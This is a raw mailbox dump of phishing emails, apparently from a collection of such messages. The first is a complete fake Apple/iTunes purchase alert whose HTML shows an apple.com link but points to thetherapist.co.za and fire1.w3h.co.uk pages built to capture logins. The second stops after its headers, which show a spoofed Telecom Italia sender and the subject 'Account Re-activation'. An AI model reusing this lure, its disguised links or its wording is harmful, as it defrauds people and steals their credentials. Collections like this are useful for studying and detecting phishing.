From: "Apple" <xx@mail.com>
Date: Sat, 02 Jul 2016 05:53:05 +0100
Return-Path: xx@mail.com
Message-ID: <RBS-LIVE-WEB-01yQge00000881@rbs.isiteportal.co.uk>
X-OriginalArrivalTime: 02 Jul 2016 04:53:05.0328 (UTC) FILETIME=[9EC49B00:01D1D41D]
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 286

You will not see this in a MIME-aware mail reader.
--===============1794994160==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

You've bought a program "Tom Tom" from the Apple Store. (billings@itunes.co=
m)
It may take a few moments for this transaction to appear in your account.

If you have not authorized this charge, log in as soon as possible to cance=
l the payment!

http://apple.com/uk/tom/tom.htm

When the payment will be canceled you will gt a full refund.

iTunes Secure Payments


--===============1794994160==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P>You've bought a program "Tom Tom" from the =
<SPAN class=3Dil>Apple</SPAN> Store. (<U><A href=3D"mailto:billings@itunes.=
com" target=3D_blank data-cke-saved-href=3D"mailto:billings@itunes.com">bil=
lings@itunes.com</A></U>)<BR>It may take a few moments for this transaction=
 to appear in your account.<BR><BR>If you have not authorized this charge, =
<A href=3D"http://thetherapist.co.za/redirect.php" rel=3Dnofollow target=3D=
_blank data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dh=
ttp://fire1.w3h.co.uk/fire/fire.htm&amp;source=3Dgmail&amp;ust=3D1467514418=
413000&amp;usg=3DAFQjCNE1OoBEaqOmysgb1Q7WK-JukDS1Sg" data-cke-saved-href=3D=
"http://thetherapist.co.za/redirect.php">log in</A> as soon as possible to =
cancel the payment!<BR><BR><U><A href=3D"http://apple.com/uk/tom/tom.htm" r=
el=3Dnofollow target=3D_blank data-saferedirecturl=3D"https://www.google.co=
m/url?hl=3Den&amp;q=3Dhttp://fire1.w3h.co.uk/fire/fire.htm&amp;source=3Dgma=
il&amp;ust=3D1467514418413000&amp;usg=3DAFQjCNE1OoBEaqOmysgb1Q7WK-JukDS1Sg"=
 data-cke-saved-href=3D"http://thetherapist.co.za/redirect.php">http://appl=
e.com/uk/tom/tom<WBR>.htm</A></U><BR><BR>When the payment will be canceled =
you will gt a full refund.<BR><BR>iTunes Secure Payments<BR></P></BODY></HT=
ML>
--===============1794994160==--

From jose@monkey.org Tue Jul  5 01:10:27 2016 +0000
Return-Path: amministrazione@telecomitalia.it
Delivered-To: jose@monkey.org
X-FDA: 71700564894.01.spade08_3f4d854c3802
X-Spam-Summary: 75,0,0,3534eb765bb096f2,d41d8cd98f00b204,amministrazione@telecomitalia.it,:,RULES_HIT:41:72:152:355:379:474:495:800:962:967:969:973:978:983:988:989:1147:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1433:1434:1436:1437:1516:1517:1518:1534:1542:1560:1571:1575:1588:1589:1592:1594:1623:1685:1711:1714:1730:1749:1777:1792:1803:2195:2198:2199:2200:2525:2527:2543:2560:2563:2610:2682:2685:2790:2859:2890:2915:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3867:3871:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4552:5007:6650:6669:6674:6678:6685:7652:8516:8517:8518:8583:8599:8603:8987:9025:9121:9388:9411:9416:9908:10004:10049:10346:10400:11233:11473:11480:11657:11658:11914:12043:12523:12555:12658:12660:12740:12764:13025:13139:13235:13237:13374:13975:14096:14181:14721:14828:14829:21080:21433,0,RBL:188.15.202.74-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fe,
X-HE-Tag: spade08_3f4d854c3802
X-Filterd-Recvd-Size: 4096
Received: from RomagnoliSaxFirewall.local (host74-202-static.15-188-b.business.telecomitalia.it [188.15.202.74])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  5 Jul 2016 01:10:26 +0000 (UTC)
Received: from [10.0.0.1] (bzq-210-168-31-70.red.bezeqint.net [31.168.210.70])
	(authenticated bits=0)
	by RomagnoliSaxFirewall.local (9.0.0) with ESMTP id u64FGrJj031105
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 amministrazione@telecomitalia.it verify=NOT)
	for <jose@monkey.org>; Mon, 4 Jul 2016 17:31:47 +0200
Message-Id: <201607041531.u64FGrJj031105@RomagnoliSaxFirewall.local>
Content-Type: multipart/alternative; boundary="===============0317951039=="
MIME-Version: 1.0
Subject: Account Re-activation
To: jose@monkey.org
